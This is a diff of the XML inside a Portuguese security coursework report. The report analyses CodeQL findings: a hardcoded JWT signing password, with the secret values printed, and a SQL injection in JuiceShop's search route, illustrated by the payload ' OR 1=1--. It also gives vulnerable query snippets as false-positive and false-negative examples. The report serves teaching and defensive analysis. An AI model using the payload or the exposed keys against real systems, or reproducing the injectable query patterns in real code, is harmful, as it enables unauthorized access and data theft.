+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1455168094" name="Picture 1" descr="A screenshot of a computer program&#10;&#10;AI-generated content may be incorrect."/>
+                    <pic:cNvPicPr>
+                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
+                    </pic:cNvPicPr>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId14" cstate="print">
+                      <a:extLst>
+                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
+                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
+                        </a:ext>
+                      </a:extLst>
+                    </a:blip>
+                    <a:srcRect/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr bwMode="auto">
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="3659871" cy="1410053"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                    <a:noFill/>
+                    <a:ln>
+                      <a:noFill/>
+                    </a:ln>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Caption"/>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Figura </w:t>
+      </w:r>
+      <w:r>
+        <w:fldChar w:fldCharType="begin"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:instrText xml:space="preserve"> SEQ Figura \* ARABIC </w:instrText>
+      </w:r>
+      <w:r>
+        <w:fldChar w:fldCharType="separate"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t>8</w:t>
+      </w:r>
+      <w:r>
+        <w:fldChar w:fldCharType="end"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> - Resultado da execução da query HardcodedPasswordField.ql</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -2980,7 +3157,7 @@
           <w:iCs/>
           <w:lang w:val="pt-PT"/>
         </w:rPr>
-        <w:t xml:space="preserve"> Resultados: hardcoded credential (JWT) </w:t>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -2990,9 +3167,155 @@
           <w:iCs/>
           <w:lang w:val="pt-PT"/>
         </w:rPr>
-        <w:t xml:space="preserve">- </w:t>
-      </w:r>
-      <w:r>
+        <w:t>Estrutura do JWT e uso da password exposta</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="PostHeadPara"/>
+        <w:rPr>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t>A query HardcodedPasswordField.ql identificou uma entrada no ficheiro JWTRefreshEndpoint.java que contém uma password usada para assinar/verificar tokens JWT.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="PostHeadPara"/>
+        <w:rPr>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="PostHeadPara"/>
+        <w:rPr>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t>O</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> JWT</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> (JSON Web Token)</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> é composto por três partes separadas por pontos. A primeira parte é o header (cabeçalho), que contém metadados sobre o token, incluindo o tipo e o algoritmo de assinatura. A segunda parte é o payload (corpo), que contém as claims, ou seja, os dados e informações do utilizador. A terceira parte é a signature (assinatura), que garante a integridade e autenticidade do token. O formato final é header.payload.signature, onde cada parte é codificada em Base64URL.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="PostHeadPara"/>
+        <w:rPr>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t>O código define duas passwords constantes. A primeira é `PASSWORD = "bm5nhSkxCXZkKRy4"`, que é usada apenas para autenticação de login. A segunda é `JWT_PASSWORD = "bm5n3SkxCX4kKRy4"`, e esta é a password crítica usada em todas as operações JWT.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="PostHeadPara"/>
+        <w:rPr>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t>A `JWT_PASSWORD` aparece em três locais distintos no código. Primeiro, no método `createNewTokens`, onde é utilizada para assinar o token através do método `signWith`, que recebe o algoritmo HS512 e a password. Segundo, no método `checkout`, onde é usada como chave de verificação através do método `setSigningKey` do parser de JWT. Terceiro, no método `newToken`, onde novamente serve para validar tokens através do mesmo mecanismo de parsing.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="PostHeadPara"/>
+        <w:rPr>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t>A operação criptográfica utilizada é o HMAC-SHA512, representado pelo algoritmo HS512. O HMAC (Hash-based Message Authentication Code) é um algoritmo de autenticação que combina uma função hash criptográfica com uma chave secreta. No caso específico do HS512, a função hash utilizada é a SHA-512.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="PostHeadPara"/>
+        <w:rPr>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve">A `JWT_PASSWORD` funciona como a chave secreta simétrica em todo este processo. Quando um token é criado, o servidor combina o header e o payload codificados com a `JWT_PASSWORD` usando o algoritmo HMAC-SHA512 para gerar uma assinatura digital. Esta assinatura é então anexada ao token. Quando o token precisa de ser verificado, a mesma password é usada </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t xml:space="preserve">para recalcular a assinatura e compará-la com a assinatura presente no token. Qualquer alteração no header ou no payload, sem conhecimento da password, </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t>irá resultar</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> numa assinatura inválida e o token será rejeitado.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="PostHeadPara"/>
+        <w:rPr>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t>Trata-se de uma assinatura simétrica, onde a mesma chave é usada tanto para assinar como para verificar o token, ao contrário de algoritmos assimétricos como o RS256 que utilizam pares de chaves pública e privada distintas.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Head3"/>
         <w:rPr>
           <w:b/>
           <w:bCs w:val="0"/>
@@ -3000,52 +3323,8 @@
           <w:iCs/>
           <w:lang w:val="pt-PT"/>
         </w:rPr>
-        <w:t>análise técnica</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="PostHeadPara"/>
-        <w:rPr>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t>A query HardcodedPasswordField.ql identificou uma entrada no ficheiro JWTRefreshEndpoint.java que contém uma password usada para assinar/verificar tokens JWT.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="PostHeadPara"/>
-        <w:rPr>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t>(COLOCAR IMAGEM DE EXEMPLO)</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t xml:space="preserve">: </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t>Os ficheiros de apoio que preparaste (4b.txt, 4c.txt) descrevem a estrutura do JWT, o uso da password no código e os riscos associados.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Head3"/>
+      </w:pPr>
+      <w:r>
         <w:rPr>
           <w:b/>
           <w:bCs w:val="0"/>
@@ -3053,7 +3332,8 @@
           <w:iCs/>
           <w:lang w:val="pt-PT"/>
         </w:rPr>
-      </w:pPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:b/>
@@ -3062,17 +3342,21 @@
           <w:iCs/>
           <w:lang w:val="pt-PT"/>
         </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs w:val="0"/>
-          <w:i w:val="0"/>
-          <w:iCs/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t>Impacto prático (o que um atacante pode fazer)</w:t>
+        <w:t xml:space="preserve">Ações que o atacante pode explorar caso conheça a password. </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Para"/>
+        <w:rPr>
+          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
+        </w:rPr>
+        <w:t>Se um atacante conseguir aceder ao código fonte e descobrir a JWT_PASSWORD, pode comprometer completamente a segurança do sistema.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3087,7 +3371,19 @@
         <w:rPr>
           <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
         </w:rPr>
-        <w:t>Com a chave JWT_PASSWORD exposta (hardcoded) um atacante consegue:</w:t>
+        <w:t>Com a chave JWT_</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
+        </w:rPr>
+        <w:t>PASSWORD</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> um atacante consegue:</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3139,35 +3435,7 @@
         <w:rPr>
           <w:lang w:val="pt-PT"/>
         </w:rPr>
-        <w:t xml:space="preserve">: modificar claims (ex.: </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t>admin:false</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> → </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t>admin:true</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t>) e assinar com a chave comprometida.</w:t>
+        <w:t>: modificar claims (ex.: admin:false → admin:true) e assinar com a chave comprometida.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3211,26 +3479,6 @@
           <w:lang w:val="pt-PT"/>
         </w:rPr>
       </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t>(COLOCAR IMAGEM DE EXEMPLO)</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t xml:space="preserve">: </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t>excerto de código do JWTRefreshEndpoint.java que a query sinalizou. Se não tens o ficheiro fonte no relatório, faz uma captura do resultado da query no VS Code e insere como figura.</w:t>
-      </w:r>
-      <w:bookmarkStart w:id="1" w:name="sbmn"/>
-      <w:bookmarkEnd w:id="1"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -3248,11 +3496,3348 @@
         </w:rPr>
       </w:pPr>
     </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="PostHeadPara"/>
+        <w:rPr>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="PostHeadPara"/>
+        <w:rPr>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="PostHeadPara"/>
+        <w:rPr>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="PostHeadPara"/>
+        <w:rPr>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Head1"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Aplicação Web JuiceShop</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Head2"/>
+        <w:rPr>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t>Alteração do gatilho do f</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t>luxo do trabalho para ser acionado manualmente</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Para"/>
+        <w:rPr>
+          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Para"/>
+        <w:keepNext/>
+        <w:jc w:val="center"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:eastAsia="en-US"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="06F0630A" wp14:editId="57B4939C">
+            <wp:extent cx="3928631" cy="4213860"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="239457243" name="Picture 1" descr="A screenshot of a computer program&#10;&#10;AI-generated content may be incorrect."/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="239457243" name="Picture 1" descr="A screenshot of a computer program&#10;&#10;AI-generated content may be incorrect."/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId15"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="3931987" cy="4217460"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Caption"/>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Figura </w:t>
+      </w:r>
+      <w:r>
+        <w:fldChar w:fldCharType="begin"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:instrText xml:space="preserve"> SEQ Figura \* ARABIC </w:instrText>
+      </w:r>
+      <w:r>
+        <w:fldChar w:fldCharType="separate"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t>9</w:t>
+      </w:r>
+      <w:r>
+        <w:fldChar w:fldCharType="end"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> - Código alterado para permitir execução manual (workfl</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t>ow_dispatch adicionado)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Head2"/>
+        <w:rPr>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Para"/>
+        <w:rPr>
+          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
+        </w:rPr>
+        <w:tab/>
+        <w:t>A etapa e o comando usado pela Ação CodeQL para inicializar a base de dados com metados sobre o código fonte, é a seguinte:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Para"/>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:lang w:eastAsia="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:lang w:eastAsia="en-US"/>
+        </w:rPr>
+        <w:t>/opt/hostedtoolcache/CodeQL/2.23.3/x64/codeql/codeql database init --force-overwrite --db-cluster /home/runner/work/_temp/codeql_databases --source-root=/home/runner/work/cs-mod2-security-in-software-gn_10/cs-mod2-security-in-software-gn_10 --calculate-language-specific-baseline --extractor-include-aliases --sublanguage-file-coverage --language=javascript --codescanning-config=/home/runner/work/_temp/user-config.yaml (linha 1247 - Initialize CodeQL)</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:lang w:eastAsia="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ParaContinue"/>
+        <w:rPr>
+          <w:lang w:eastAsia="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ParaContinue"/>
+        <w:rPr>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
+        </w:rPr>
+        <w:t>A base de dados da a</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">nálise </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t>que resulta da análise do código</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> encontra-se na seguinte diretoria:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ParaContinue"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="23"/>
+        </w:numPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>/home/runner/work/_temp/codeql_databases</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ParaContinue"/>
+        <w:rPr>
+          <w:lang w:eastAsia="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Head2"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Para"/>
+        <w:rPr>
+          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">O CodeQL identifica uma vulnerabilidade de SQL Injection (CWE-89) no ficheiro routes/search.ts porque o código constrói uma query SQL com dados vindos do utilizador, sem validação ou parametrização. O trecho vulnerável é o seguinte: models.sequelize.query(SELECT * FROM Products WHERE ((name LIKE '%${criteria}%' OR description LIKE '%${criteria}%') AND deletedAt IS NULL) ORDER BY name) O valor da variável criteria vem de req.query.q, um parâmetro da query string do pedido HTTP, que é a source (origem controlada pelo utilizador). Esta variável é usada diretamente na execução da query SQL através de models.sequelize.query(), o sink (ponto onde o dado é usado de forma insegura). Isto permite que o utilizador injete comandos SQL arbitrários. Por exemplo, ao enviar GET /search?q=' OR 1=1--, a query resultante torna-se sempre </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>verdadeira, podendo devolver todos os registos da tabela ou expor dados sensíveis. O CodeQL assinala esta falha como “Database query built from user-controlled sources”, pois existe um fluxo de dados não filtrado entre a source (req.query.q) e o sink (sequelize.query()).</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ParaContinue"/>
+        <w:rPr>
+          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Head2"/>
+        <w:rPr>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Para"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="23"/>
+        </w:numPr>
+        <w:rPr>
+          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Falso positivo: </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">a ferramenta de análise indica que existe uma vulnerabilidade, mas na realidade o código é seguro. </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Para"/>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="23"/>
+        </w:numPr>
+        <w:rPr>
+          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
+        </w:rPr>
+        <w:t>Exemplo:</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> const userInput = req.query.id; const safeInput = parseInt(userInput); // sanitização db.query(SELECT * FROM Users WHERE id = ${safeInput}); A análise pode sinalizar um SQL Injection, mas o parseInt garante que apenas números são usados, tornando a query segura. </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ParaContinue"/>
+        <w:rPr>
+          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Para"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="23"/>
+        </w:numPr>
+        <w:rPr>
+          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Falso negativo: </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">a ferramenta não identifica uma vulnerabilidade real, ou seja, o código é inseguro mas a análise não assinala problema. </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Para"/>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="23"/>
+        </w:numPr>
+        <w:rPr>
+          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
+        </w:rPr>
+        <w:t>Exemplo:</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> const userInput = req.query.name; db.query(SELECT * FROM Products WHERE name LIKE '%${userInput}%'); Aqui há SQL Injection real, mas a análise pode não detetar porque o input é usado dentro de LIKE, gerando um falso negativo.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ParaContinue"/>
+        <w:ind w:firstLine="0"/>
+        <w:rPr>
+          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Head1"/>
+        <w:rPr>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t>Análise dinâmica em aplicações web e a ferramenta Zed Attack Proxy (ZAP)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Head2"/>
+        <w:rPr>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Para"/>
+        <w:ind w:firstLine="360"/>
+        <w:rPr>
+          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
+        </w:rPr>
